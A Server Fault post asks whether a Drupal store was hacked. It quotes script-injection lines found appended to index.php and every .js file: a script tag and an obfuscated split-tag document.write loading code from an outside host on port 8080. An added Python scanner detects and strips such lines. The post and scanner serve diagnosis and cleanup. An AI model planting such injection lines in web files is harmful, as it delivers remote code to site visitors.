Has my site been attacked?
Posted by fretje on Server Fault
Published on 2010-06-16T13:15:23Z
This is about an online store based on Drupal 5.
All of a sudden it didn't work anymore. Upon accessing the site, this error came up:
Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 38
Upon further inspection I found the following two lines at the end of said index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
After manually removing those 2 lines, the site seems to work fine again.
But after more problems (with editing pages) were reported, I found out that actually all the *.js files are "infected". They all contain an extra line at the end:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Has this site been hacked? Upon googling for "blog.nodisposable.com", nothing interesting comes up. That site itself seems legitimate. It's probably hacked itself?
Can anybody explain how this could have happened? What can I do to reverse this? And what can I do to avoid this in the future?
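The following Python scanner is an added example, not part of the original post. It walks a web root and reports files whose last lines match the three shapes quoted above (a script tag loading from a host with an explicit port, the split-tag document.write call, and the 32-hex-digit HTML comment), optionally stripping them. The function names, the extension list and the host.example sample data are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Shapes of the lines quoted in the post; the host name is not hard-coded.
PATTERNS = (
    re.compile(rb'<script[^>]*\bsrc="https?://[^"/]+:\d+/[^"]*"[^>]*>\s*</script>', re.I),
    re.compile(rb"document\.write\('<s'\+'cript[^;]*</scr'\+'ipt>'\);"),
    re.compile(rb"<!--[0-9a-f]{32}-->"),
)
EXTENSIONS = {".php", ".js", ".html", ".htm"}

def split_trailing_injection(data):
    """Return (clean_bytes, injected_lines) for matching lines at the end of a file."""
    lines = data.split(b"\n")
    end, injected = len(lines), []
    while end > 0:
        line = lines[end - 1].strip()
        if line and not any(p.search(line) for p in PATTERNS):
            break  # first legitimate line from the bottom: stop
        if line:
            injected.append(line.decode("latin-1"))
        end -= 1
    clean = b"\n".join(lines[:end]) + b"\n" if injected else data
    return clean, injected[::-1]

def scan_tree(root, fix=False):
    """Map each affected file under root to its injected trailing lines."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            clean, injected = split_trailing_injection(path.read_bytes())
            if injected:
                findings[path.relative_to(root).as_posix()] = injected
                if fix:
                    path.write_bytes(clean)
    return findings

def demo():
    """Build a constructed web root (host.example is a placeholder) and scan it."""
    tag = b'<script type="text/javascript" src="http://host.example:8080/x.js"></script>'
    write = b"document.write('<s'+'cript type=\"text/javascript\" src=\"http://host.example:8080/x.js\"></scr'+'ipt>');"
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_bytes(b"<?php\nboot();\n" + tag + b"\n<!--" + b"0123456789abcdef" * 2 + b"-->\n")
        Path(root, "misc.js").write_bytes(b"var a = 1;\n" + write + b"\n")
        Path(root, "clean.js").write_bytes(b"var b = 2;\n")
        return scan_tree(root, fix=True), scan_tree(root), Path(root, "index.php").read_bytes()

if __name__ == "__main__":
    print(demo())
```

Run it with fix=False first to see how many files are affected. Stripping the lines does not address whatever allowed the files to be modified, so restoring from a known-good backup and changing credentials remain the safer recovery.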